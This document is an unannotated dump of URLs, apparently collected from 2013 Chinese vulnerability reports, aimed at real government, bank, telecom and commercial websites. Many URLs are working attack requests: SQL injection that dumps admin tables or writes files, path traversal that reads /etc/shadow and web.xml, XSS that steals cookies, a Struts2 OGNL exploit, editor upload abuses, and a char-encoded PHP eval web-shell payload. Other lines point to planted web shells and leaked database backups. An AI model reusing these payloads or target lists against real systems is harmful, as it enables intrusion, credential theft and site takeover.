http://218.21.78.40:7000/Foundation/easyWork/Config/AuthorityConfig.aspx http://218.21.78.40:7000/Foundation/easyWork/showwork.aspx http://www.ainol.com/plugin.php?identifier=ainol&module=article&action=info&articleid=621’ http://mall.uc.cn:8020/login.php http://mall.uc.cn:8020/fckeditor/editor/filemanager/connectors/php/upload.php http://mall.uc.cn:8020/fckeditor/editor/filemanager/connectors/php/upload.php?Type=Media&CurrentFolder=%2F http://www.ellechina.com/esa2011/interact_player.php?id=47+and+1=2+union+select+1,user(),3,4,5,6,7&type=4 http://subscribe.ellechina.com/websubscribe/deco_info_new.aspx?code=ED203’ http://www.weimeizi.com/topic.php?channelID=6&topicID=12 http://cw-info.shenzhenair.com/QMYS/Web/index.aspx http://cw-info.shenzhenair.com/QMYS/Web/UploadFile/YSFJ/2013/06/2013060809201***.aspx http://www.998.com/Reservations/ViewOrderInfo.aspx?CRSResvNo=130608120971032 http://www.998.com/Reservations/ViewOrderInfo.aspx?CRSResvNo=130608120971031 http://www.998.com/Reservations/ViewOrderInfo.aspx?CRSResvNo=130608120971010 http://www.998.com/Reservations/ViewOrderInfo.aspx?CRSResvNo=130608120971030 http://www.998.com/Reservations/ViewOrderInfo.aspx?CRSResvNo=130608120971019 http://www.998.com/Reservations/ViewOrderInfo.aspx?CRSResvNo=130608120971014 http://www.1008612580.com:9000 boss1.sports.sohu.com/other/ftx/.svn/entries svn://10.11.5.91:2121/BBBoss/webroot/other/ftx svn://10.11.5.91:2121 http://old.cuba.com.cn/cubadata/gamelist.php?seasonid=14 http://old.cuba.com.cn/cubadata/gamelist.php?seasonid=14 http://old.cuba.com.cn/cubadata/gamelist.php?seasonid=14 http://www.tianjingas.com/tjsinfo/index/index.action http://www.998.com/campus/rember.aspx http://www.xtqxj.com/zh.asp?id=289 http://web.10050.net/Admin/Upload.asp http://www.huihongled.com/ http://www.bjmglz.com(自助设备生产商,跳沙盒环境大多都是拿这种自助设备下手的,在信息系统中也泄漏了这些设备订单的相关数据配置) http://www.hallsia.com/ http://www.intehel.cn(这两个都是恒鑫亚的网站) http://www.xxx.com/reportFiles/cj/cj_zwcjd.jsp http://www.newwinner.cn/MailUI/MailContent.aspx?mailId=174870&mailStatusId=2745084&height=450&width=600&TB_iframe=true http://www.newwinner.cn/MailUI/MailContent.aspx?mailId=174355&mailStatusId=2745084&height=450&width=600&TB_iframe=true http://baoliao.10yan.com/admin/commentnum1.asp?id=2913 http://www.aiyonet.com/user/UManage/bankrec.asp http://www.aiyonet.com/user/UManage/bankrec.asp http://www.aiyonet.com/user/left.asp http://www.aiyonet.com/user/left.asp后,左下角会出现一个转到admin管理。点就可以转到管理员了 http://www.l99.com/view.action?postId=2370967 http://www.google.com.hk/search?q=KJ021320+JSP+Manage-System http://e-learning.cnpc.com.cn/jsp/index3.jsp http://122.226.206.134/download/a/商务.zip http://t.sohu.com/mailBox/deleteAllMail http://t.sohu.com/noticeBox/deleteAllNotice http://t.sohu.com/settings/bindMobile/sendVerificationCode?mobileNumber=15066666666 http://pushemail.10086.cn/e/dynpage/get/content.php?id=1210&mobile=15120016119&resolution=320*480 http://cms.300.cn/cms/jsp/login/login.jsp http://ncc.cma.gov.cn/Website/index.php?ChannelID=1 http://invest.china.com.cn http://invest.china.com.cn/wwwroot/Log/W3SVC602851844/ex130601.log http://invest.china.com.cn/wwwroot/Log/W3SVC602851844/ex130602.log http://invest.china.com.cn/wwwroot/Log/W3SVC602851844/ex130603.log http://invest.china.com.cn/AddNews.aspx?operator=Insert&channelID=000000010003&channelName=%u7535%u5b50%u5546%u52a1 http://invest.china.com.cn/admin/Login_zk.aspx http://www.pci-china.com/ http://www.orsc.org.cn/ http://ting.sohu.com/send/sending_setcookie.php?cpcode=asdf http://ting.sohu.com/send/balance_user.php?userid_comm=d'%20and%20t1.user_id=t2.user_id%20%20%20union%20all%20select%20%22xxddoo%22,2,3%20INTO%20OUTFILE%20%22/mfs/wwwroot/ting/send/nixuehan.html%22--%20 http://www.cmdi.gov.cn/ http://www.cmdi.gov.cn:5555"可遍历目录,找到些有用的东西; http://www.cmdi.gov.cn:5555/YLQX/fxgc_czcp.asp; https://i.yeepay.com/fangzheng/creditcard/creditcard_new_prepareinput.action http://eoss.300.cn/system/login.do http://sms.tom.com/index.php http://f.game.tom.com/movie/onunload.php?serverid=1%20AND%20%28SELECT%208515%20FROM%28SELECT%20COUNT%28*%29,CONCAT%280x3a7073683a,%28SELECT%20%28CASE%20WHEN%20%288515=8515%29%20THEN%201%20ELSE%200%20END%29%29,0x3a7362653a,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 http://www.xzwater.gov.cn/hwzwgk/main/action/main!login.action http://contact.audi.cn/m/dealer/msizes!seljxs.action jar:/usr/local/tomcat/bin/commons-logging-api.jar server:/usr/java/jdk1.5.0_16/jre/lib/i386:/usr/java/jdk1.5.0_16/jre/../lib/i386 http://java.sun.com/ jdbc:oracle:thin:@10.172.12.42:1521:a jdbc:oracle:thin:@10.172.12.42:1521:a http://java.sun.com/ http://java.sun.com/cgi-bin/bugreport http://ac.51job.com/phpAD.tar.gz http://www.zltfda.gov.cn/login.asp http://sdn.kugou.com/link.aspx?id=3480&url=http://51yyzl.com/comeon http://my.phpstat.net/update.php http://my.phpstat.net/export.php http://ahndskxb.ahau.edu.cn/wwwroot.zip http://admin.300.cn/ewebeditor/admin/login.php http://www.zzsf.gov.cn/news/admin/index.asp http://www.zzgqt.gov.cn/plus/Ajaxs.asp?action=GetRelativeItem&Key=goingta%2525%2527%2529%2520%2575%256E%2569%256F%256E%2520%2573%2565%256C%2565%2563% http://www.zzkpw.com/pass.asp http://www.zzkpw.com/manage/ http://www.zzsnw.gov.cn/admin/ http://www.zzsnw.gov.cn/admin/upfile/fileManage.asp?folder=../admin/ http://www.zzgp.gov.cn/admin/ http://www.zzgp.gov.cn/admin/upfile/fileManage.asp?folder=../admin/ http://www.zzjxw.gov.cn/admin/default.asp http://www.zzjxw.gov.cn/admin/upfile/fileManage.asp?folder=../admin/ http://www.skdzz.com/admin/admin_main.asp http://www.skdzz.com/admin/upfile/fileManage.asp?folder=../admin/ http://218.56.153.66/admin/upfile/fileManage.asp?folder=../ http://www.zzws.com/admin/upfile/fileManage.asp?folder=../ http://www.zzwgx.gov.cn/wgx/admin/upfile/fileManage.asp?folder=../ http://www.zzfs.org/admin/gg/a.asp;2.js www.sdzzcz.gov.cn http://www.sdzzcz.gov.cn/admin/ http://www.sdzzcz.gov.cn/db/%23fgfdszfasad%23.mdb http://www.sdzzcz.gov.cn/admin/upfile/fileManage.asp?folder=../admin http://www.sdzzcz.gov.cn/upload/news/201341922244.asp http://www.zztjj.gov.cn/User/index.asp http://www.zzsjtj.gov.cn/UserFiles/File/vshell.jsp http://qipai.pipi.cn/center.html http://yks.nsa.gov.cn/readnews.asp?id=1121 padding-left:5px display:inline vertical-align:bottom http://smscom.12321.cn:8080/temuser8080/login.jsp http://baoliao.qcyn.sina.com.cn/report/report/?m=report&act=report&time=1 http://222.91.161.254:8020/login/navigation.action http://222.90.206.18:8000/MCreditYlgl/ApproveWeb/Web/RegEntUser.aspx http://www.audiclub.cn/uploadHeadImg/uploadimage.jsp?Picurl=pic2000844.jpg%22%3EXSS%20here&step=2 http://www.audiclub.cn/circle!create.action http://www.ickey.cn/tools.php?action=dlt&type=-1 http://open.letv.com/third/ad/ad_setting.php?c=120154&id=70&p=70 http://www.hbcgr.com/ http://www.jghq.gov.cn/UploadFile/20100824022804575.jsp http://nba.hupu.com/manage/book.php http://nba.hupu.com/manage/menu.php http://nba.hupu.com/manage/url.php http://nba.hupu.com/manage/comment.php http://nba.hupu.com/news/admin/apply.php ftp://zztj.gov.cn/ http://www.998.com/News/NewsListAll.aspx?kinds=1&newskind=1&key= http://202.108.35.149/tongji/ http://font.xiaa.net,苦逼的前端设计人员可能会用到这玩意儿,字体管家的字体预览处有XSS漏洞,具体为: http://font.xiaa.net/exe/look.php?str=aaa&size=20&lang=cn http://font.xiaa.net/zip/cn/1.zip',1,this http://font.xiaa.net/exe/look.php?str= http://lno.pw/test_4141.js http://lno.pw/test_4141.js http://123.125.105.76/ http://60.28.244.181/ http://60.28.244.156 http://210.17.38.180/ http://115.239.133.251:6090/imweb/toSouGou/index.html VERSION:1.2.2 www.cnooc.com.cn Version:9.3.6-P1 www.cnooc.com.cn Version:9.3.6-P1 VERSION:1.2.2 www.cbrc.gov.cn www.cbrc.gov.cn www.cbrc.gov.cn http://zone.pptv.com/vmei/xs?team=yellow http://www.oppo.com/index.php?q=software/list&type=3&t=ASC http://www.oppo.com/index.php?q=software/list&type=3&t= http://www.21578.com/Web/index/noticeshow.aspx?noid=26 VERSION:1.2.2 www.mod.gov.cn http://www.hgbookvip.com:8000/editor/filemanager/browser/default/connectors/test.html# http://www.qzdatasoft.com:8088/qznjw/ewebeditor/admin/ http://www.iscompetition.net/jsp/index/downFile.jsp?filename=/../../../../../../etc/passwd http://games.kugou.com/ServiceAdmin/ClientQuestion/Results.aspx?recordcount=211269&page=1 http://yangfanbook.sina.com.cn http://admin.activity.91.com/ http://en.admin.activity.91.com/ http://www.ln.sgcc.com.cn/login/CmsSubmit.do com.tencent.minihd.qq/databases/文件夹下,将相应QQ号码的数据库拷贝出来,例如1234567.db,接着在电脑上用SQLiteSpy软件打开这个文件,friends表的内容是好友信息,mr_friend_******里的内容是与******好友的聊天记录,都是明文存放,方便查看。 http://www.hasmx.hrss.gov.cn//FckEditor/editor/filemanager/connectors/aspx/connector.aspx?Command=CreateFolder&Type=File&CurrentFolder=/a.asp&NewFolderName=z&uuid=1369647267562 http://202.108.37.189/tongji/ http://www.sdosta.org.cn/web15/usersys/login.action http://df.ycga.gov.cn/copy.php http://df.ycga.gov.cn/admin.php http://df.ycga.gov.cn/manager.php http://df.ycga.gov.cn/admin/ http://df.ycga.gov.cn/administrator/ http://bj.bbs.house.sina.com.cn/bbs/post/show/?pid=5749808347977109478&retcode=0测试帖 http://www.96877.sh.cn/admin/login.htm http://www.96877.sh.cn/admin/admtianxuan168in_admin_ok.asp?id=4 http://180.153.132.4/SqlLog.txt http://www.yonyou.com.hk/new/enquiry.php?uid=1 http://www.yonyou.com.hk/story/index.php?id=XSSCODE http://www.yonyou.com.hk/new/admin/ http://blog.sina.com.cn/s/blog_aec37ed20101b0j3.html http://fn-sso.ceair.com:7010/sso/sso-login.do nlogin:cnhhuan+用户名 http://www.cnpat.com.cn/ http://www.cnpat.com.cn/login.aspx http://www.cnpat.com.cn/shangchuan/ http://mi.qianlong.com/admin/ http://subject.yonyou.com/20130315.rar http://www.yonyou.com.hk/new/content.php?uid= http://yts.yonyou.com/NewsAction_cyyj.do?title= http://tobacco.yonyou.com/admin/index.jsp http://www.yonyou.com.hk/new/admin/index.php http://myerp.yonyou.com/admin/login.aspx http://audit.yonyou.com/admin/login.php http://bs.hnds.gov.cn/FCKeditor/editor/filemanager/browser/default/browser.html?type=File&connector=connectors/jsp/connector http://bs.hnds.gov.cn/UserFiles/File/中, http://plus.aili.com/vote/vote_end.php?vid=31 http://plus.aili.com/vote/vote_end.php?vid=31%20UNION%20ALL%20SELECT%20username,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20from%20admin%20-- http://help.cnki.net/Live800_1_2.aspx?GroupID=502&PageID=101007&Name=&CookieName=TTKN_OnLine_800 http://www.mangocity.com/TB2BWeb/jsp/ordermanage/clientOrderSettlement_queryOrder.action http://www.mangocity.com/TB2BWeb/jsp/sysmanage/searchContent_saveOrUpdate.action http://wooyun.org http://wooyun.org http://127.0.0.1/phpwind/src/extensions/getshell/php.php http://sales.263.net/ http://sales.263.net/clientManager/ http://xzfw.wuhai.gov.cn/1.jsp http://www.oppo.com/index.php?q=software/list&type=3&&d=ASC http://www.oppo.com/index.php?q=software/list&type=3&&d= http://www.oppo.com/index.php?q=software/list&type=3&&d=and%200%3C%3E(select%20count(*)%20from%20admin) http://www.oppo.com/index.php?q=software/list&type=3&&d=%22/%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E http://theme.oppo.com/?q=index/theme&theme_id=31322%22/%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E http://account.oppo.com/sysadmin/htm/?q=user/register&back=http%3A%2F%2Ftheme.oppo.com%2F%3Fq%3Dindex%2Ftheme%26theme_id%3D31322%2522%2F%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253E http://www.yonyou.com.hk/admin/index.php http://www.hwexpo.com北京海闻展览有限公司存在SQL盲注漏洞,包括其制作的12个展览会网站。后台密码相对简单。 http://www.hwexpo.com/index.asp?tid=523 http://www.hw expo.com/index.asp?tid=523 http://www.hwexpo.com/admin/ http://www.laipin.com/ http://www.laipin.com/shop/goods!keySearch.action http://www.laipin.com/shop/goods!keySearch.action?('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(d) http://it365.yesky.com/ http://61.178.185.67:85/UpLoadFile.jsp http://61.178.185.67:88 http://61.178.185.67 http://www.csi.ac.cn http://www.csi.ac.cn/manage/content/docmanage/download.jsp?filePath=/../../../../etc/shadow http://www.seis.ac.cn http://www.seis.ac.cn/manage/content/docmanage/download.jsp?filePath=/ycszsxx/../../../../../etc/shadow http://www.eq-hl.com http://www.eq-hl.com/manage/content/docmanage/download.jsp?filePath=/rsc/../../../../../etc/shadow http://www.eq-xj.gov.cn http://www.eq-xj.gov.cn/manage/content/docmanage/download.jsp?filePath=/rsjy/2013/../../../../../../etc/shadow http://www.eqyn.com http://www.eqyn.com/manage/content/docmanage/download.jsp?filePath=/zhfy/../../../../../etc/shadow http://www.nx.earthquake.cn http://www.nx.earthquake.cn/manage/content/docmanage/download.jsp?filePath=/files/../../../../../etc/shadow http://www.eqsd.gov.cn http://www.eqsd.gov.cn/manage/content/docmanage/download.jsp?filePath=/../../../../etc/shadow http://lifestyle.rayli.com.cn/comment/saysth.php?id=1 http://lifestyle.rayli.com.cn/inseasonnow/userdish.php?id=1 http://lifestyle.rayli.com.cn/comment/topic.php?cid=1 http://lifestyle.rayli.com.cn/comment/channeldetailcount.php?channel=1&did=1 http://www.oppo.com/?q=search&search=%20%22%2F%3E%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E%20 http://www.oppo.com/?q=search&search= http://itlianghui.ccw.com.cn/2007/upload.php http://xtep.ellll.com/index.action http://open.189.cn/discuz/plugin.php?id=question2answer http://www.hubeibank.cn http://www.hubeibank.cn/download/download.jsp?filepath=/uploadfiles/yhjj/zygg/../../../../WEB-INF/web.xml&filename=web.xml http://ebank.pzhccb.com http://ebank.pzhccb.com/download/download.jsp?filepath=/site323/uploadfiles/gncj/../../../../WEB-INF/web.xml&filename=web.xml http://www.bankoffs.com.cn http://www.bankoffs.com.cn/download/download.jsp?filepath=/uploadfiles/syqt/ggl/../../../../WEB-INF/web.xml&filename=web.xml http://www.bankhs.com.cn http://www.bankhs.com.cn/download/download.jsp?filepath=/uploadfiles/ggfb/../../../WEB-INF/web.xml&filename=web.xml http://www.bankofhld.com http://www.bankofhld.com/download/download.jsp?filepath=/uploadfiles/fwgg/../../../WEB-INF/web.xml&filename=web.xml http://www.bankofxinxiang.net http://www.bankofxinxiang.net/download/download.jsp?filepath=/uploadfiles/helpqy/../../../WEB-INF/web.xml&filename=web.xml http://www.xtbank.com http://www.xtbank.com/download/download.jsp?filepath=/site902/uploadfiles/rczp/../../../../WEB-INF/web.xml&filename=web.xml http://chengdebank.com http://chengdebank.com/download/download.jsp?filepath=filepath=/uploadfiles/helpqy/../../../../download/download.jsp&filename=download.jsp http://so.haodf.com/all.php?fromcode=***&type=***&q= http://search.haodf.com/all.php?fromcode=***&type=***&q= URL:http://so.haodf.com/all.php?fromcode=utf-8&type=all&q= http://so.haodf.com/all.php?fromcode=utf-8&type=all&q=exp*或者http://search.haodf.com/all.php www.baidu.com URL1:http://search.haodf.com/all.php?orderby=1&q= www.baidu.com URL2:http://search.haodf.com/all.php?orderby=1&q= www.baidu.com http://caipiao.online.sh.cn/index.action http://qqmail.xinnet.com http://qqmail.xinnet.com/FCKeditor/editor/filemanager/browser/default/browser.html?type=File&connector=connectors/jsp/connector http://qqmail.xinnet.com/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector http://qqmail.xinnet.com/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector提交 http://qqmail.xinnet.com/Modules/common/components/FCKeditor/editor/filemanager/browser/default/browser.html?type=File&connector=connectors/jsp/connector http://qqmail.xinnet.com/Modules/common/components/FCKeditor/editor/filemanager/browser/default/browser.html?type=File&connector=../../../../../../../../FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector http://sinamail.xinnet.com/Modules/common/components/FCKeditor/editor/filemanager/browser/default/browser.html?type=File&connector=../../../../../../../../FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector http://api.xinnet.com/Modules/common/components/FCKeditor/editor/filemanager/browser/default/browser.html?type=File&connector=../../../../../../../../FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector http://shtec.esf.soufun.com/Sign/UploadNext.aspx http://wq.tom.com/plus/moon.php http://www.189fy.com//plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=40&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=44&arrs2[]=101&arrs2[]=120&arrs2[]=112&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=44&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=41&arrs2[]=32&arrs2[]=86&arrs2[]=65&arrs2[]=76&arrs2[]=85&arrs2[]=69&arrs2[]=83&arrs2[]=40&arrs2[]=57&arrs2[]=48&arrs2[]=49&arrs2[]=51&arrs2[]=44&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96&arrs2[]=44&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=57&arrs2[]=48&arrs2[]=115&arrs2[]=101&arrs2[]=99&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=103&arrs2[]=117&arrs2[]=105&arrs2[]=103&arrs2[]=101&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39&arrs2[]=41&arrs2[]=32&arrs2[]=35&arrs2[]=32&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96 http://www.189fy.com/plus/mytag_js.php?aid=9013 http://www.189fy.com/plus/90sec.php http://vrm.lafaso.com/vendor/index!exitQueryCount.action?vexchangeId=75556 http://game.96963.com/game_ct.php?id=239 http://fsb.guosen.com.cn/wlxt/KCManage/KC_info_hh.aspx http://fsb.guosen.com.cn/wlxt/CGmanage/CGD_manage.aspx http://show.ellechina.com/2201638/ http://show.ellechina.com/2201638/ ztadmin.house365.com/admin.php http://3g.96963.com/news_ct.php?id=258 http://jsfile.duapp.com/timer.js http://jsfile.duapp.com/timer.js后,换eval为prompt解密如下: http://jsfile.duapp.com/payload.js http://tieba.baidu.com/f/commit/thread/add http://tieba.baidu.com/p/ http://www.czjt.gov.cn/ http://www.czjt.gov.cn:8090/publicfiles/business/htmlfiles/czsjtj/ashipin/1307990171328/455.jsp?sort=1&dir=C%3A%5C http://sns.3g.ifeng.com/v1/pim2.jsp?sid=ifeng:8338:26248!1371019278256&pt=1:53456 ifeng:8338:26248!1371019278256&pt=1:53456这个应该是这个号的id http://tieba.baidu.com/p/2390579271 http://jsfile.duapp.com/ http://tieba.baidu.com/f?ie=utf-8&kw=%E7%AD%B1%E9%A3%8E%E6%9C%89%E6%84%8F http://elearning.100e.com/lvword/ApplyAdd.asp http://elearning.100e.com/lvword/ApplyDel.asp http://elearning.100e.com/lvword/ApplyDel_NoCloseWinDow.asp http://en.100e.com/buy/chklgn.asp http://en.100e.com/global/chklgn.asp http://en.100e.com/buy/VerifyName.asp?MemberName=1 http://www.ytnst.cn/ http://ytnst.cn/ytsp/admin.asp http://ytnst.cn/ytsp/ytzcjytsp.mdb http://sso.jinku.com/login/login.action https://sfapitest.baidu.com/wgsandbox/apitestPage.action encap:Ethernet F2:E9:08:8C:7B addr:10.52.143.58 Bcast:10.52.143.255 Mask:255.255.255.0 MTU:1500 packets:3999977533 dropped:40130 overruns:40130 packets:4414261032 txqueuelen:1000 http://show.aili.com/index.php?m=content&c=goods&a=myhome&uid=850085 http://show.aili.com/phpsso_server/api.php?op=uc http://www.xinnet.com/Modules/agent/domain/domain-dns.jsp http://www.ehome365.cn/yijia/booking.asp?ID=1 http://gtzl.mlr.gov.cn/nsdg/dgwFrontWeb/dgwFrontWeb_index.action?selectServernodeId=4 http://www.chinabenet.com http://my.58.com/deleteinfo/?infoid=14219463211911 http://www.xx.com/content.aspx?lb=dl http://www.xx.com/content.aspx?lb=dl http://www.xx.com/content.aspx?lb=dl http://www.yinei.com/ http://www.telecom10000.com/new_3.asp?id=52 http://www.larcw.com/comInfo.php?id=5607 http://www.wuyouonline.com/business.php?id=3 http://www.znzcn.com/tongxinzhishi_c.php?id=82 http://www.shlongtian.com/solutionshow.php?id=11 http://www.cmzdrc.com/job_show.php?id=745 http://www.ysten.com/traseedetail.php?id=128 http://city.cd.qq.com/app/?type=1001&mod=api&act=friendsAdd&of=js&name= http://www.soidc.com/idc-detaile.php?id=1 http://tmxk.org/book/%E5%AF%86%E7%A0%81.mp4 http://117.27.135.200:8080/FjOpenEpp/login.action http://www.u5.cn/login.action http://live.xiaoi.com http://live.xiaoi.com/plus/mybak.php http://v.iiyi.com/admin http://rw.baidu.com/User/info http://tms1.zte.com.cn/WorkCost/HumanCost/UI/FillMyWorkHourOut.aspx?span=1 http://xiazaiadmin.dichan.com/winmanzone/ http://www.channelping.net//expenseTeacherAction.action http://app.baidu.com/app/enter?appid=103488 http://www.sjzszlxx.com www.sjzszlxx.com DAV:sql http://tools.52pk.com:8088/Manager/Update/ToolWeb_Update_Mes.aspx?ToolId=1 http://mall.uc.cn:8020/fckeditor/editor/filemanager/connectors/php/upload.php http://mall.uc.cn:8020/fckeditor/editor/filemanager/connectors/php/upload.php?Type=Media&CurrentFolder=%2F www.pcbpartner.com.cn http://www.pcbpartner.com.cn/web/pinke/index.action http://125.70.9.159/list.aspx http://www.szpay.net/login_news.action http://www.ccshcc.cn/news-more.asp?id=1273%20and%201=1%20&smallclassname=%B9%AB%CB%BE%D2%AA%CE%C5 http://www.ccshcc.cn/admin/login.asp http://wxtao.sinaapp.com/1.js http://support.netgear.com.cn/kb_web_files/search.asp http://support.netgear.com.cn/doucument/More.asp?id=1874 https://www.cnseu.org/forum.php?mod=viewthread&tid=1977&extra=page%3D2 http://www.oppo.com http://telpay.lakala.com/kfn/loginAction.action http://www.kingbase.com.cn/yingpin.php?type=sh&id=7 https://www.cnseu.org/forum.php?mod=viewthread&tid=1936&extra=page%3D1 http://www.honren.com.cn/index.action http://chidt.house.sina.com.cn/news_list.php?type=1&tech=1 http://mcms.auto.ifeng.com/index.php http://img.auto.ifeng.com/uploadfile/2013/0613/20130613101540656.html https://www.cnseu.org/forum.php?mod=viewthread&tid=1937&extra=page%3D1 http://dealer.auto.ifeng.com/admin/js/ckfinder/ckfinder.html http://dealer.auto.ifeng.com/upload/user/files/20130613_194145.jpg/.php https://www.cnseu.org/forum.php?mod=viewthread&tid=1432&highlight=%E7%99%BE%E5%BA%A6 http://app.book.ifeng.com/poem/index.php?_c=admin&_a=list&type=poetry http://rddp.midea.com.cn:9083/rtssh/LoginAction.action http://lcab.ccidnet.com/data/mysql_error_trace.inc http://chall.3owl.com/ http://www.fssia.org/info.asp?TT=5&SS=0%2B0%2B0%2B9 http://61.178.24.86/webShop/flowCard/gotoIndex.action?productBigType=7&configId= http://gs.189.cn/ http://gs.189.cn/webShop/flowCard/gotoIndex.action?productBigType=7&configId= http://61.178.24.86/webShop/flowCard/gotoIndex.action?productBigType=7&configId= http://bbs.360safe.com/member.php?mod=logging&action=logout&.jpg http://%62%62%73%2E%33%36%30%73%61%66%65%2E%63%6F%6D/%6D%65%6D%62%65%72%2E%70%68%70?%6D%6F%64=%6C%6F%67%67%69%6E%67&%61%63%74%69%6F%6E=%6C%6F%67%6F%75%74&.jpg http://photo2.idate.163.com/album/41/89/4/46f876053ff4b1aa55a70a4b1298967b/27620489//lit/PORTRAIT_CERT_BR http://218.69.33.1/ http://61.181.141.65/ http://www.cszx.gov.cn/ http://www.cszx.gov.cn/admin.rar http://www.cszx.gov.cn/cszx.gov.cn.rar http://zone.wooyun.org/content/4228 http://jifen.womai.com/index.php URL:http://jifen.womai.com/share.php?activity=6&code=13055364&mid=0 http://www.yczzb.gov.cn/ http://www.yczzb.gov.cn/photovote/data/Xiao5u.mdb http://www.yczzb.gov.cn/news/post.php http://www.yczzb.gov.cn/news/member/post.php?job=postnew&fid=4 http://www.yczzb.gov.cn/hsyf_admin/ http://yktadmin.zoosnet.net/ http://yktadmin.zoosnet.net/web.config http://yktadmin.zoosnet.net/admin.rar http://yktadmin.zoosnet.net/LR_Admin/login.aspx http://bk.shenzhenpost.com.cn/bkweb/webpage!toHomePage.action http://cn.pub.vpon.com/login.action http://fcgyyy.com/admin/ http://qyxx.edugd.cn/topic.php?channelID=3&topicID=99 http://qyxx.edugd.cn/topic.php?channelID=3&topicID=99 http://qyxx.edugd.cn/topic.php?channelID=3&topicID=99 http://www.cardesales.com/Product/Mobile/OperationProcess.html http://neclub.netgear.com.cn/nebs/downloads.asp?PageIndex=100&ID=20 http://60.28.61.198:8000/MessageBord/ContentReply.aspx?id= http://guozhan.sanguosha.com/ http://zone.wooyun.org/content/4226 http://poobbs.com/account/resetpwd/mid/a5148ecf1c9f85aadcf0e2feb881df73 http://www.jste.net.cn/uids/login!login.action http://exam.szzfgjj.com/login.do http://youxi.baidu.com/yx/select/ http://event.youku.com/siemens-home/openthekitchen2013/save.php?action=videourl&id=1 http://weban.whjs.gov.cn:8080/aqold/ http://gkpj.scnu.edu.cn/NewsPress.aspx?tid=2 http://gkpj.scnu.edu.cn/admin/login.aspx http://minisite.youku.com/app/index.php?act=api_youku_video&operate=single&vid=1 http://cpi.11185.cn/order/viewOrder.html?orderId=Y1306091652259132016 http://cpi.11185.cn/order/pay.action?orderId=Y1306091652259132016 admin5.com/data/mysql_error_trace.inc http://www.ccard.net.cn/ccard/coverdetails/fullCover!getCardFromCover.action?coverid=4a4ffa1639d39e3f0139e1b72bca0378&categoryid=402848f139ae06630139b4437d2c0014 http://www.ccard.net.cn/ccard/covers/product!productConte.action?productId=ff8080813d0cdb89013d3f0145f2040f http://www.ccard.net.cn/ccard/coverdetails/fullCover!getfullcover.action?categoryid=4a4ffa1639d39e3f0139e21735ba03d6%27%20-- http://www.ccard.net.cn/ccard/html/pages/emailInput.jsp www.ccard.net.cn/ccard/Login/userLogin!jiaoYanEmail.action?userId=用户编号 http://www.ccard.net.cn/ccard/showItem/item!getContent.action?sysItemvalueid=ff8080813c6091e8013c951a54df0dcc%27 http://www.ccard.net.cn/ccard/cartpage/shopcart!viewProductPic.action?productId=ff8080813ef4bcdc013f283121e400d3%27%20and%201=1-- http://comment2.rayli.com.cn/js/ http://comment2.rayli.com.cn/json/hzp/ http://comment2.rayli.com.cn/json/ http://market2.yesky.com/currentplay/view/currentplayProduct/login.jsp http://mysoft.yesky.com/jsp/admin/login.jsp http://manage.jxs.yesky.com/jsp/olympic/login.jsp http://buy.yesky.com/jsp/dealer/login.jsp http://market2.yesky.com/currentplay/uploadfile/619/1252553039611116.txt http://219.239.88.35/repository/playproject http://admin.tianjimedia.com/system/list.jhtml user:root site:mail.sina.com.cn/apps/netdisk/download.php http://m0.mail.sina.com.cn/apps/netdisk/download.php?id=4363dc35ccf27edeb5a935cc79de32c7jRiN0027 